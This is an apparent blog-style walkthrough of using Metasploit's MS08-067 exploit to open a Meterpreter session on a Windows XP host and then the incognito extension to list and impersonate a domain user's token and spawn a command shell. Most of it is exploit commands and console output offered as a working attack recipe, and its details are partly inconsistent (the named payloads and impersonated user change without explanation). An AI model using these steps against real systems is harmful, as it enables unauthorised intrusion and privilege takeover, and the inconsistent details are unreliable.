Impersonation of Users Using Metasploit -{Old but Effective}

Now we will see how to impersonate a system user without having to create a new user with administrator permissions.

First let's suppose that we have entered the PC with an exploit like :

• exploit / windows / smb / ms08067netapi

and with a PAYLOAD like :

• windows / vncinject / bind_tcp

In this case we will use the PAYLOAD windows / shell / bind_tcp . I will not explain much because many knows it .

msf console



| | | | (_) |

_ _ _| | _ _ _ | | _| |

| ' ` \ / \ _/ ` / _| ' \| |/ \| | _|

| | | | | | _/ || (| \_ \ |) | | () | | |

|| || ||\_|\_\_,|_/ ._/||\_/|_|\_|

| |

|_|

= metasploit v3.3.2-release [core:3.3 api:1.0

• -- --= 462 exploits - 219 auxiliary
• -- --= 192 payloads - 22 encoders - 8 nops

= svn r7808 updated 16 days ago (2009.12.10)

Warning: This copy of the Metasploit Framework was last updated 16 days ago.

We recommend that you update the framework at least every other day.

For information on updating your copy of Metasploit, please see:

http://dev.metasploit.com/redmine/projects/framework/wiki/Updating

msf > use exploit/windows/smb/ms08067netapi

msf exploit(ms08067netapi) > set RHOST 192.168.0.3

RHOST => 192.168.0.3

msf exploit(ms08067netapi) > set PAYLOAD windows/meterpreter/bind_tcp

PAYLOAD => windows/meterpreter/bind_tcp

msf exploit(ms08067netapi) > exploit

* Started bind handler

* Automatically detecting the target...

* Fingerprint: Windows XP Service Pack 2 - lang:Spanish

* Selected Target: Windows XP SP2 Spanish (NX)

* Triggering the vulnerability...

* Sending stage (723456 bytes)

* Meterpreter session 1 opened (192.168.0.2:4661 -> 192.168.0.3:4444)

meterpreter >

• After obtaining the Meterpreter , we will execute the use plus the incognito option

meterpreter > use incognito

Loading extension incognito...success.

meterpreter >

• We look at what options you have:
• code
• meterpreter > help

Incognito Commands

==================

Command Description

------- -----------

addgroupuser Attempt to add a user to a global group with all tokens

addlocalgroupuser Attempt to add a user to a local group with all tokens

add_user Attempt to add a user with all tokens

impersonate_token Impersonate specified token

list_tokens List tokens available under current user context

snarf_hashes Snarf challenge/response hashes for every token

meterpreter >

• We will use the list_tokens command . But let's see what parameters you have for execution:

code

• meterpreter > list_tokens

Usage: listtokens order_option>

Lists all accessible tokens and their privilege level

OPTIONS:

-g List tokens by unique groupname

-u List tokens by unique username

meterpreter >

• Now we will show the existing users in the System:
• Code:

meterpreter > list_tokens -u

Delegation Tokens Available

========================================

COLTEJER\ServerColtejer

NT AUTHORITY\Servicio de red

NT AUTHORITY\SERVICIO LOCAL

NT AUTHORITY\SYSTEM

Impersonation Tokens Available

========================================

NT AUTHORITY\ANONYMOUS LOGON

meterpreter >

• Now comes the moment when we are going to supplant a user.
• Code

meterpreter > impersonate_token COLTEJER\\ServerColtejer

• Delegation token available
• Successfully impersonated user COLTEJER\ServerColtejer

meterpreter >

• Open the console or remote shell of the deprecated user. In this case the user ayman\ Serverayman

Code:

meterpreter > execute -f cmd.exe -i -t

Process 1528 created.

Channel 1 created.

Microsoft Windows XP Versi¢n 5.1.2600

(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>